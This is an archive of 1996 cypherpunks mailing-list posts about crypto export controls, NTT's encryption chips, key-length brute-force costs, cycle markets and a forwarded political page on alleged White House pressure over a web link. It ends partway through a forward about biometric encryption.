>   export of any encryption device with a key length longer than 40-bits,
>   or roughly the equivalent of  Captain Crunch decoder ring. For hardcore
>   math types, I'm told that a 1024-bit key length is 10 to the 296th
>   power more difficult to break than 40 bits.

No comment.

 
>   Bizdos seems to have found crypto's magic bullet;  a legit way to
>   essentially give the finger to U.S. export laws for crypto product.

Really?


>   In fact, it's a crime even to put a program like PGP on your laptop and
>   go overseas.   The State Department calls that "exporting."

Golly day!


>   After setting up his Japanese unit, he hired a crack team
>   of Japanese crypto experts who essentially "reverse engineered" the
>   company's own U.S. crypto product, according to Kurt Stammberger, RSA
>   director of technology marketing.

Hot dang!


>   It was a brilliant move.   Bizdos
>   can't be slammed by the State Department for violating crypto export
>   laws because, well, he didn't export a damn thing, except some U.S.
>   greenbacks, which of course, could have gone to U.S. cryptographers,
>   but let's not quibble about jobs.
 
>   Anyone want to kick around the subject of global competitiveness?
>
>   What's happened here is the Japanese have now trumped the entire world
>   on the crypto market.   What's more, Clinton's brain-dead allegiance to
>   the FBI, et al., has now allowed the Japanese government, which still
>   owns a large share of NTT, which owns a minority share of RSA's
>   Japanese subsidiary, to have a lock on the world's strongest encryption
>   technology.   Can you say "Remember the VCR"  or "Remember the
>   Semiconductor" or how about "Thanks, Bill.  We're fucked."

Yes, the guvmint is really stupid, huh?


Remind me not to subscribe to cyberwire ...


Serious point - what are the chances that the key generator has been
tampered with? (assuming the generation is done within the chipset).


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 4 Jun 1996 23:50:35 +0800
To: cypherpunks@toad.com
Subject: NYT on NTT/RSA Chips
Message-ID: <199606041054.KAA14598@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Connecting Declan's three dots [...]: 
 
 
   The New York Times, June 4, 1996, pp. D1, D4. 
 
 
   Japanese Chips May Scramble U.S. Export Ban 
 
   By John Markoff 
 
 
   Washington, June 3 -- The Nippon Telegraph and Telephone 
   Corporation has quietly begun selling a powerful data- 
   scrambling chip set that is likely to undermine the Clinton 
   Administration's efforts to restrict the export of the 
   fundamental technology for protecting secrets and commerce 
   in the information age. 
 
   The existence of the two-chip set, which will have broad 
   potential application for local computer networks, the 
   Internet and telephone switching networks, was disclosed 
   here in a speech today at a public policy workshop by the 
   chief executive of RSA Data Security, a Silicon 
   Valley-based company that has frequently dueled with the 
   Administration over its export-control policies. 
 
   The executive, Jim Bidzos, said that his company was 
   negotiating with N.T.T., the giant telecommunications 
   concern, to resell the chips in the United States. Mr. 
   Bidzos also said that N.T.T. had already made sales in 15 
   countries, including in the United States to I.B.M. 
 
   "N.T.T. has done a lot of research and development work on 
   this product" he said. "There is clearly going to be a lot 
   of demand for their chips." 
 
   An executive at NTT America said that although there were 
   no restrictions on the export of cryptographic hardware or 
   software from Japan, his company was still anxious to 
   obtain software from RSA Data to use in its chips. That 
   software is still controlled by United States export law, 
   he said. 
 
   "We'd like to use this technology," said Junichi Kishigami, 
   director of NTT America, which is based in Mountain View, 
   Calif. "It is important to employ good international 
   standards." 
 
   Mr. Bidzos has been a vocal and longtime opponent of United 
   States export laws that prohibit the sale, without a 
   special license, of products that have powerful 
   data-scrambling capabilities. The Government's policy is 
   directed at limiting the spread of systems that could make 
   it more difficult for American intelligence and 
   law-enforcement agencies to conduct electronic 
   surveillance. 
 
   Such restrictions have been bitterly opposed in recent 
   years by American computer and telecommunications 
   companies; they have argued that the technology is already 
   widely available internationally and that manufacturers and 
   software developers in the United States are in danger of 
   losing markets to foreign competitors. The N.T.T. 
   technology would seem to support those contentions. 
 
   "The United States export controls are at risk from 
   Japanese competition," said Stewart Baker, a Washington 
   lawyer who is the former general counsel for the National 
   Security Agency. 
 
   The N.T.T. device also underscores fundamental differences 
   that exist between Japan and the United States on the issue 
   of privacy in the information age. 
 
   While United States officials have struggled to maintain 
   their ability to conduct electronic surveillance, Article 
   21 of Japan's Constitution specifically forbids 
   wiretapping. 
 
   "It's very interesting that the Japanese regard for privacy 
   in their Constitution translates into better cryptographic 
   technology," said Marc Rotenberg, director of the 
   Electronic Privacy Information Center, a Washington public 
   policy group and an organizer of today's workshop on data 
   scrambling. 
 
   Mr. Bidzos said that N.T.T.'s chips, which have been 
   developed and manufactured by a subsidiary, N.T.T. 
   Electronic Labs, were far more powerful than the so-called 
   Clipper chip, a data-scrambling system that the Clinton 
   Administration proposed for the nation's telephone system. 
 
   While the Clipper system has a built-in "back door" 
   intended to permit the F.B.I. to gain wiretap information, 
   the N.T.T. system has no such surveillance feature, It also 
   uses much stronger data-encryption algorithms than United 
   States export laws permit. 
 
   Those laws restrict the export of encryption systems which 
   employ digital "keys" of more than 40 bits in length. The 
   new N.T.T chips, however, are based on the United States 
   data encryption standard, which has a 56-bit key, and 
   actually triples the strength of that standard. Such a 
   scrambling system is believed to be beyond the capability 
   of the most powerful code-breaking system. 
 
   In addition to the "private" key system for scrambling 
   data, N.T.T. uses RSA Data's "public" key method to permit 
   computer users who have not previously exchanged 
   information to swap-private key information safely. The 
   N.T.T. system uses the RSA Data key, which is 1,024 bits in 
   length, also far stronger than the United States export 
   regulations permit. 
 
   "If there is anyone in the Government who hasn't already 
   seen the writing on the wall, here it is," Mr. Bidzos said. 
 
   He said that RSA Data had set up a small subsidiary in 
   Japan last year and that he was now negotiating with N.T.T. 
   to make a minority investment in that subsidiary in 
   exchange for N.T.T.'s gaining access to the RSA Data public 
   key technology. 
 
   The N.T.T. technology is at least partly the result of an 
   initiative by Japan's Ministry of International Trade and 
   Industry, which 18 months ago made a $120 million national 
   commitment to develop products to facilitate electronic 
   commerce. 
 
   "This is a major business opportunity that the Japanese see 
   clearly," said Deborah Hurley, an official at the 
   Organization for Economic Cooperation and Development, the 
   Paris-based international group. 
 
   RSA Data was acquired in April by Security Dynamics 
   Technologies Inc., a computer security company based in 
   Cambridge, Mass., in a stock deal valued at $250 million. 
   Mr. Bidzos said that the two companies had continued to 
   operate relatively independently. 
 
   [End] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Wed, 5 Jun 1996 08:24:21 +0800
To: cypherpunks@toad.com
Subject: Cost of brute force decryption
Message-ID: <Pine.BSI.3.91.960604105230.14677A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain



    Windows NT Magazine ran an article in their May 1996 issue titled 
"Secure Enterprise Email - How Safe is Your Mail System" that goes into 
matters of keeping company email private.  PGP and other means of 
encryption are mentioned along with the following:

	"If you can ensure secrecy either until no one cares about the 
information or so that cracking the code costs more than the information 
is worth, it's 'secure enough.'

	"For example a 40-bit key takes about $10,000 worth of supercomputer 
time and two weeks to crack.  Although this key may be adequate to 
protect my checking account, it's probably not large enough for the 
accounts of a major corporation.

	"A slightly longer key of 56 bits requres millions of dollars to 
crack and should protect the information for years to come.  A 56-bit 
encryption key has 2^56-or 72 quadrillion-possible keys.  With 1,000 
computers, each trying 1,000,000 keys per second, trying them all would 
take 833 days.  On average, you find the key halfway through your search.

    I was curious as to what type of formula was used to determine these 
figures since it wasn't mentioned in the article.  Obviously, the speed 
of the computers, method of cracking and other such factors would be 
important to know.  Could anyone shed some additional light on this for 
me?  Thanks.

                    Bruce M. * brucem@feist.com
        ~---------------------------------------------------~
        "Knowledge enormous makes a god of me." -- John Keats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Wed, 5 Jun 1996 08:03:08 +0800
To: cypherpunks@toad.com
Subject: Re: Java
Message-ID: <ADD9C79B-4063AD@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz <frantz@netcom.com> wrote:

>In the long run, I hope to use Java to sell cycles.  Java has the
advantage
>in a cycle market that it is machine independent, and the Just In Time
>compilers should make the performance reasonable.
>

Has anyone written a Java app to implement the Chinese Lottery?  Seems like
a natural way to do it.  A small cash prize might entice lots of folks to
let it run in the background...

	Clay

---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reply@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 4 Jun 1996 21:57:24 +0800
To: cypherpunks@toad.com
Subject: Gov. archives
Message-ID: <199606041107.LAA11420@avignon.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


For anyone who hasn't already, check out http://csrc.nist.gov. There
is a ton of groovy government info on such things as:

Computer Systems Security and Privacy Board

NIST pubs and letters

Privacy forum archives

RISK forum archives

Software

Unix security info

Secure internet connections

Crypto module validation

Secure hash standard

NBS data encryption

Key escrow 

Computer security roles in NIST and the NSA

Secure telephone terminals

Too much other info to be listed!!!

Also, you can access them by ftp@  csrc.nist.gov, or access their BBS.
(cs-bbs.nist.gov)

Have fun.

Remember, Big Brother is watching! 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 5 Jun 1996 08:27:52 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Electronic Signature Act Of 1996
In-Reply-To: <Pine.A32.3.93.960604102759.21416A-100000@navajo.gate.net>
Message-ID: <199606041511.LAA09110@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ben Holiday writes:
> Florida now recognizes electronic signatures as legal and binding. In
> other words - its okay to sign it by modem.
[...]
> California and Utah are the only other states that have laws recognizing
> electronic signatures.

The lawyers here can correct me if I am wrong, but I get the
impression that under the common law, an ink signature is merely a
demonstration that a party assented to a contract, and except for
certain contracts (which usually require witnesses etc.) there is no
requirement in the law that a contract even be on paper. Given this, a
digital signature could probably, under existing common law, be used
as evidence of intent in a contract dispute just as a paper and ink
signature could be, except in cases like real estate transfers which I
already mentioned.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Wed, 5 Jun 1996 07:58:22 +0800
To: bryce@digicash.com
Subject: Re: cycle market
In-Reply-To: <199606041351.PAA21165@digicash.com>
Message-ID: <96Jun4.111407edt.9324@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


Graphical rendering is one place where I might like a cycle
market.  Finite element simulation is another.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 11:43:38 +0800
To: cypherpunks@toad.com
Subject: Export what's imported
Message-ID: <199606041824.LAA02369@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently, Senator Burns introduced that bill, S.1726, "ProCode."  Part of it 
had to do with changes in the export laws to allow export of things that are 
currently not allowed.

It occurs to me that this bill should be amended to say, explicitly, that 
any object or software which has ever been imported into the US can be 
legally exported. (Including multiple copies of software.)  It is 
particularly important that we do this now that the NTT encryption chip set 
has been announced.   Why?

Well, first, we CAN easily justify this.  The claim for export controls is 
that they restrict the access of encryption to various of the horsemen, out 
there.  But by definition anything which has ever been imported is already 
available outside the US, so it'll look rather silly if they try to control 
somebody from export that came from out of the country.

What are the benefits?  Maybe it'll destroy the entire 
crypto-export-regulation system.  Domestic software companies can simply set 
up a practice of buying all their crypto expertise from overseas.  If this 
happened over the long term this would be bad, but it won't because within a 
couple of years good crypto will be exported by American manufacturers based 
on foreign designs.  Pretty soon the export bans will become meaningless 
(even more so than they are today) and the pressure to remove the last 
restrictions will be enormous.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Wed, 5 Jun 1996 08:59:30 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: S/MIME key sizes
In-Reply-To: <v02120d0badd919d1ddb3@[192.0.2.1]>
Message-ID: <31B45529.747B@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 15:58 6/3/96, Raph Levien wrote:
> 
> >   Basically, an exportable S/MIME client can transmit messages up to
> >1024/40 bit RSA/RC2 (or RSA/DES), and receive messages up to 512/64 bit
> >RSA/RC2 (or RSA/DES, but in the latter case I would imagine it's actually
> >restricted to 512/56 because of the keysize of DES). Note that the
> >asymmetry actually points in different directions for the public and
> >symmetric keysizes.
> 
> What will be the maximum keysize for a domestic encryption client? It it is
> larger than 1024 bits, there will be interoperability problems with foreign
> clients. If the domestic client is limited to 1024 bits, it would set a bad
> precedence, since it would effectively require that the encryption key is
> smaller than the largest signature key.

   There is no restriction on non-export keysize, as far as I know. Of 
course, if you do use a key larger than 1024 bits, then export clients 
can not encrypt to you. I don't consider this to be a serious 
limitation. I'd far rather see an error message of "cannot encrypt to 
client - your software is crippled" than "encrypting to recipient with 
super-duper 40-bit cipher". The more crippled the export version appears 
to be, the more pressure there is to upgrade to a non-export version.

   I object to the word "domestic" to refer to non-crippled encryption 
programs. I use "non-export" because that seems least likely to cause 
confusion. Keep in mind that clients developed outside the US are also 
non-crippled. The word "domestic" seems to unfairly exclude them.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 5 Jun 1996 11:37:43 +0800
To: SINCLAIR  DOUGLAS N <bryce@digicash.com
Subject: Re: cycle market
Message-ID: <199606041847.LAA22383@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 AM 6/4/96 -0400, SINCLAIR  DOUGLAS N wrote:
>Graphical rendering is one place where I might like a cycle
>market.  Finite element simulation is another.

Sinclair mentions some of my favorites.  Others are:

(1) Attacking RSA-nnn challanges.
(2) Brute forcing 56 bit keys to demonstrate that 1DES is obsolete.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Wed, 5 Jun 1996 12:14:59 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff in NYT on NTT/RSA chip
In-Reply-To: <Pine.3.89.9606032128.A10202-0100000@well>
Message-ID: <v03007101adda1bc74f88@[206.151.234.118]>
MIME-Version: 1.0
Content-Type: text/plain


There are still a few unclear (to me) points about this story:

1. CWD says that RSA's Japanese subsidiary developed the chips. Markoff
says NTT did. It sounds to me like NTT is the more likely developer, since
they have a great deal of silicon design experience.

2. Markoff's story says that NTT doesn't have licenses to use RSA
technology (the quote from Junichi Kishigami), but the bit about safely
swapping private-key info makes me wonder if instead they're using DH-- the
patent for which expires next year. A telecom chipset could make productive
use of DH for key exchange at call setup.

3. Once you import an ITAR item, its export becomes controlled. Importing
the NTT chipset for use, say, in a Motorola cell switch (made in IL) would
seem to be problematic. Buying chips in Japan for shipment to Moto's phone
factories in Singapore and Malaysia, however, would appear to be OK. Under
the present export regs, it's not clear to me how many US manufacturers
would adopt this chipset since it doesn't give them any export relief. If
the NRC's recommendations are adopted, that still won't help, since
triple-DES is over their recommended limit.

The _good_ news is that US manufacturers could put these chipsets into
domestic-only products, and I sincerely hope they will.

-Paul


--
Paul Robichaux                    LJL Enterprises, Inc.
paul@ljl.com                      Be a cryptography user. Ask me how.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie moscaritolo <vinnie@webstuff.apple.com>
Date: Wed, 5 Jun 1996 12:21:01 +0800
To: cypherpunks@toad.com
Subject: Info on DES crypto program
Message-ID: <v03006f01adda38e7aa44@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


Hey all;

Does anyone have experience or comments about a product called Code Cryptor
from New Mexico Software. I belive it is yet another DES based product. tey
have a web page at:

http://www.swcp.com/cryptor/


"Rah's Samoan Attorney"

Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Wed, 5 Jun 1996 09:28:17 +0800
To: cypherpunks@toad.com
Subject: Re: Gov. archives - NSA
In-Reply-To: <199606041107.LAA11420@avignon.hypereality.co.uk>
Message-ID: <31B46EB2.4470@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Also interesting from a historical cryptography standpoint is the NSA
web site (which you probably already know about).

http://www.nsa.gov:8080/

Interesting information about Soviet one-time pad ciphers and about 
crypto-related documents from the WW2 era that are being declassified.
[I really want to see the picture of a Japanese purple cipher machine.]

But keep in mind, as with the previous post:

> 
> Remember, Big Brother is watching!
> 
> 

Brian Durham
bdurham@metronet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Haskovec <dhaskove@ucsd.edu>
Date: Wed, 5 Jun 1996 11:57:45 +0800
To: cypherpunks@toad.com
Subject: Re: Class III InfoWar: TST Article
In-Reply-To: <199606022238.WAA16332@pipe2.t1.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960604122601.20280A-100000@sdcc10.ucsd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here's the reply I got from a friend that I forwarded it to....


     and the verdict is... NetMYTH!  I checked the cite in the article on 
     cyberterrorism... no such article ran on 6/2/96 in the Times 
     (London)... nor, in fact, in any newspaper available on Nexis... 
     just thought I would let you know...

     

On Sun, 2 Jun 1996, John Young wrote:

> This is the article Winn Schwartau cited to last night: 
>  
> ---------- 
>  
>  
>    The Sunday Times (London), June 2, 1996, pp. 1, 24. 
>  
>  
>    City surrenders to L400m gangs [Insight column] 
>  
>  
>    City of London financial institutions have paid huge sums 
>    to international gangs of sophisticated "cyber terrorists" 
>    who have amassed up to L400m worldwide by threatening to 
>    wipe out computer systems. 
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 5 Jun 1996 12:31:53 +0800
To: cypherpunks@toad.com
Subject: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960604193049.0072daf0@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

In a recent exchange, Carl Ellison wrote:

>After the meeting ended it hit me what the problem is and I 
>mentioned it to PRZ.  We're complaining that the Executive 
>has gone rogue -- is disobeying the will of the people.  
>PRZ likened it to Nixon's war in Cambodia.

To which Jim Bell replied:

>I have a solution to that problem.

My question for member of this list is:  When Bell finally
goes too far and they arrest or shoot him, how can we best
capitalize on his martyrdom?  Or in a more negative light,
what damage control will we need to do in that case?

Now I know that barking dogs rarely bite, but Jim may just
fool us and find his cajones.  In any event, the sort of 
yapping he is doing could itself be considered a crime that 
could attract the sort of negative attention he apparently 
craves.

Any suggestions?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 5 Jun 1996 13:40:16 +0800
To: cypherpunks@toad.com
Subject: whitehouse web incident, viva la web revolution
Message-ID: <199606041959.MAA14492@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



here's an interesting message about a white house aide pressuring
HotWired to change their link pointing to a rant page about Clinton.

it reminds me of a recent court decision in which a school tried
to shut down a student's web page that he had done on his own
time and referred to his school and other teachers.

it used to be, "freedom of the presses only belongs to those who
own a press". actually this still is, except now it only costs
$20/mo to own a worldwide "cyberspace press" via web pages.

hence what we get are interesting new social situations reminiscent
of the tension that surrounded Martin Luther's posting of the 99
theses in the middle ages. you have people who had controlled
the situation suddenly put off balance by a new medium. 

the power of information dissemination is rather significant,
and the web is the most sophisticated information dissemination 
technology ever invented by man. I expect it to have very far-reaching
social ramifications. we have barely scratched the surface..

cpunks are very interested in things like anonymity to save
oneself from the government. another approach is to simply
crow-bar the government in any way you can, whenever possible,
to make it better serve your interests. web pages have this
intrinsic power-- they're like a subtle, invisible crow bar that can
influence the world via public opinion. could there be a day
when nobody sees a need to hide from a government, because it
is so uninvasive?

------- Forwarded Message

From: "Steve Wingate" <steve@linex2.linex.com>
Date: Sat, 1 Jun 1996 20:27:28 -0700
Subject: (Fwd) WH Censorship of Web Sites (Attempted)


- - ->  SearchNet's   snetnews   Mailing List

- - ------- Forwarded Message Follows -------
Date:          Sat, 1 Jun 1996 20:38:12 -0500 (CDT)
To:            cs@oak.oakland.edu
From:          ed@athenet.net (Edward Immler)
Subject:       WH Censorship of Web Sites (Attempted)

The Skeleton Closet (at http://www.realchange.org) provides a site for
those things presidential candidates would rather not discuss.  They
cover all candidates and include a link to our current Prez.  I've
included the link below.  

Looks like this was quietly reversed, the offender sent on (to a nice
job), and nothing in the national media.

Clipper, V-chip, and now plain-old intimidation.  The WH is working
hard to control your info.

Ed
*********************************************************************


[Mr. Tall Skeleton2]   Bill Clinton's Skeleton Closet   [Mr. Tall
Skeleton]

                           [Picture of Clinton]

News Flash: White House Suppresses Skeleton Closet

In a shocking blunder, the White House successfully put pressure on
Hotwired Magazine to stop linking President Clinton's name to this
very web page. This was all done behind the scenes -- we had no idea
until we read Brock Meek's Netizen column of April 30th.

The White House official involved, David Lytel, was in charge of
creating the popular Clinton White House web site. He recently left
the White House, and is working for a private web page consultant. At
a conference, he attacked Netizen for being cynical and unfair, citing
the Skeleton Closet link. Meeks, in response, noted that Hotwired had
removed the link after receiving official pressure from the White
House. In Hotwired's "Threads" discussion, another Hotwired employee
admitted that they had been "intimidated" by receiving email from the
"whitehouse.gov" domain early in Netizen's infancy, and said she
regretted that they caved in.

Lytel's argument -- that it was "dishonest" to link Clinton's name to
a page criticizing him -- is silly of course. Apparently, he thinks
the only "honest" link is one that goes to a person's own web page, no
matter how self- serving it is. More to the point, this is a terrible
precedent. As far as we know, it is the first attempt by any American
government to squelch part of the Internet for nakedly political
reasons. (The attack on adult material online, while obviously
political, has legitimate issues -- or at least a reasonable excuse --
behind it.) And doing it privately, behind closed doors, makes it even
worse.

If we were simply seeking publicity, we'd run to Republican
politicians (who desperately need an issue) and hope they try to use
it. But that would be hypocritical. It's exactly that kind of partisan
misuse of legitimate scandals that we are trying to make obsolete here
- - -- because it muddles legitimate issues (like White House censorship
of critics) in stupid, partisan manipulation. We're trying to contact
the White House directly, to get them to disavow Lytel's actions.
We'll let you know what happens.

Update: White House Backs Down, Sort Of.

We challenged the White House to confirm or deny that Lytel pressured
Hotwired, to disavow his actions if true, and commit to a policy of
avoiding this type of censorship.

Within two days, they replied as follows:

"Date: Fri, 03 May 1996 17:06:49 -0400 (EDT)
From: WEBMASTER (WEBMASTER@a1.eop.gov)
Subject: RE: White House WWW Comments
To: webmaster (webmaster@realchange.org)
Posting-Date: Fri, 03 May 1996 17:09:00 -0400 (EDT)

It is our policy not to interfere with the content of other WEB
sites."

We'll take that as an admission that Lytel was out of line, and a
solid commitment to doing the right thing in the future. Of course,
they didn't live up to that policy before, and words are cheap.

- - ----------------------------------------------------------------------
- - ---- And now, on with the Clinton's Skeleton Closet page.

What can we say about Bill and Hillary that hasn't been said before?
Clinton's scandals are covered in such loving detail by his enemies
that we are providing you with links to various Clinton scandal pages.
Eventually, we will boil it all down and sort out the really good dirt
from the crazy stuff, but there's JUST SO MUCH to wade through!

The frustrating thing about Clinton's scandals is that the press
focuses on two-bit scandals of little importance, such as Whitewater
and this ridiculous travel office "scandal", while ignoring much more
significant dirt, such as the Mena, Arkansas contra supply and drug
operation (see link below), Hillary's $100,000 commodity profit from a
$1,000 investment, and a new charge -- that a federally funded
educational operation in New York paid her $100,000, for who knows
what.

And no one (save a few voices on the left) are protesting Clinton's
hugely successful fundraising and favors for people who have provided
it, including the Tyson Chicken empire. Running against Gramm, Dole
and Alexander, this isn't likely to be an issue, but it is a major
fault of the President.

Political Favors for Campaign Contributors

Though his administration floundered at first, Clinton has quickly
learned one aspect of Washington -- how to raise money from business
interests. He has set records in fund-raising, eclipsing even Dole's
huge haul (though not by much.) Of course, if Dole was President he
would no doubt regain the lead.

And some contributors seem to think their money is well spent. For
example, Clinton raised over a quarter million dollars from ADM, Bob
Dole's major benefactor, and pushed through a regulation benefiting
them mightily.

On the other hand, 2 Arkansas firms that formerly bankrolled Clinton
(and received help from his administration) have switched their
support to Dole -- both Tyson Chicken and Stephens investment brokers
apparently figure Dole gives a better return per contribution dollar,
or is more likely to win.

Money and Favors: Archer Daniels Midland

For example, he has received at least $270,000 from Archer Daniels
Midland corporation, the agricultural giant famous for spreading money
among various influential people, from Bob Dole to National Public
Radio. Just days after Clinton received a $100,000 check in June 1994,
his administration ordered that 30% of gasoline sold in American's 9
most polluted cities contain ethanol based additives by 1996 (as
opposed to cheaper methanol.)

Archer Daniels makes 60% of US ethanol for gas, and none of the
methanol. Bob Dole, who receives even more money from Archer Daniels
and its president, actually supported the Clinton Administration's
mandate, even while arguing against Clinton's health care proposal for
nearly identical federal mandates. (Courts have block Clinton's 30%
rule, saying he lacked power to favor ethanol over methanol.)

$100,000 for Hillary from an Educational Foundation

This allegation just came out January 10, so bear with us on it's
sketchiness. New York state's new Attorney General Dennis Vacco (a
Republican) is investigating a $100,000 in payments to Hillary or the
Rose Law Firm from the National Center on Education and the Economy, a
charity that was in Rochester New York and has since moved to
Washington, DC

Hillary was on their board, as were Mario Cuomo and Ira Magaziner, but
no other board members were paid. The justification is that Hillary
was paid to carry out some programs. When this story came out a month
ago, Vacco announced he was asking for contracts with Hillary or the
Rose Law Firm and a description of any work she actually did. Nothing
more has come of it, which -- in an election year - indicates that
nothing substantial has turned up.

- - ----------------------------------------------------------------------
- - ---- Try these links, but use a grain of salt; some of the sources are
pretty marginal.

Disgraced Clinton Administration Officials

Yahoo's Whitewater Scandal Page

Mena, Arkansas: Contra & Drug Smuggling Center?

Nick Chase's Mena, Arkansas and Whitewater pages.

Quotes

"I'm someone who has a deep emotional attachment to 'Starsky and
Hutch.' " -- Bill Clinton, 1996

"I don't think [Bill Clinton] is fooling around anymore. Nor do I
think he will. I read that Hillary threw a lamp at him. ... You know
something? I think she did." -- Ann Landers

Sources

"Primary Colors", by 'Anonymous', 1996

Wall Street Journal, in general, and in particular:
....January 12, 1996 pA14
....January 8, 1996 pA1
....December 18, 1995 pA16
....December 29, 1995 pA1
....March 23, 1995 p A1
....February 22, 1995 p A1
....January 13, 1995 p A12

"The Mena Coverup", Micah Morrison, Wall Street Journal, October 18,
1994 p A18

"The Real Cost of Ethanol" and "Dwayne's World", Dan Carney, Mother
Jones, January, 1995

"Aides Saw Political Threat In Clinton Loans From '90", Jeff Gerth,
New York Times, May 6, 1995 p7

"Ann Landers Repents For Slurring The Pope", Associated Press,
December 1, 1995

"Blocking the Box", Rick Marin, Newsweek, March 11, 1996

"NY Official Probes Payment to Mrs. Clinton", Associated Press,
January 12, 1996

BACK TO SKELETON CLOSET

Paid for by Real People For Real Change PAC and not authorized by any
candidate or candidate's committee.

Real People For Real Change is registered with the Federal Election
Commission as a non-affiliated, independent political action
committee.

Copyright 1996 Real People For Real Change PAC
  *******************************************************************
  *Edward F. Immler                      Lawrence Chemists          *
  *ed@athenet.net                        are Free Radicals          *
  *                                                                 *
  *Lawrence University '95                                          *
  *Interests: HAZMAT, EPA/OSHA Compliance, SARA III, Wastewater     *
  *DISCLAIMER: Opinions are mine...unless someone else agrees       *
  *******************************************************************



Anomalous Images and UFO Files
http://www.linex.com/ufo/

- - -> Send "subscribe   snetnews " to majordomo@alterzone.com
- - ->  Posted by: "Steve Wingate" <steve@linex2.linex.com>

- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 5 Jun 1996 13:02:23 +0800
To: cypherpunks@toad.com
Subject: biometric id
Message-ID: <199606042000.NAA14595@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



info on a biometric id utilizing crypto techniques.

------- Forwarded Message

Date: Fri, 31 May 1996 16:34:40 -0700 (PDT)
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: biometric encryption

[A Canadian company called Mytec is marketing a biometric encryption
system that, as far as anybody can tell, is an important step forward
for privacy protection.  It is based on fingerprint recognition, but
it does not produce a representation of the fingerprint or recover the
identity of the fingerprint's owner.  Instead, it uses an optically
transformed version of the fingerprint to decrypt a text string that
could be, for example, the private key for a public-key cryptographic 
system such as RSA.  Provided that one trusts the Mytec box, this
would be a way to overcome many of the pragmatic hassles that would
otherwise accompany the privacy-enhancing technologies that David Chaum
and others have described.  For example, they have built their device
into a computer mouse, so that the computer will only generate your
digital signature, or permit your mail to be read, if you are holding
the mouse (or, I suppose, if you have been holding it very recently).
In this message, the president of Mytec responds to some common concerns
